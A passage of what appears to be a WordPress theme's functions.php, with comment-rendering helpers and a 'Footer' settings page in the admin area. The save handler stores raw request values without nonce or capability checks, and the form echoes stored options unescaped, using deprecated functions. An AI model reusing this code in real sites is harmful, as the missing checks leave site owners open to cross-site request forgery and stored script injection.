                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Save changes" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
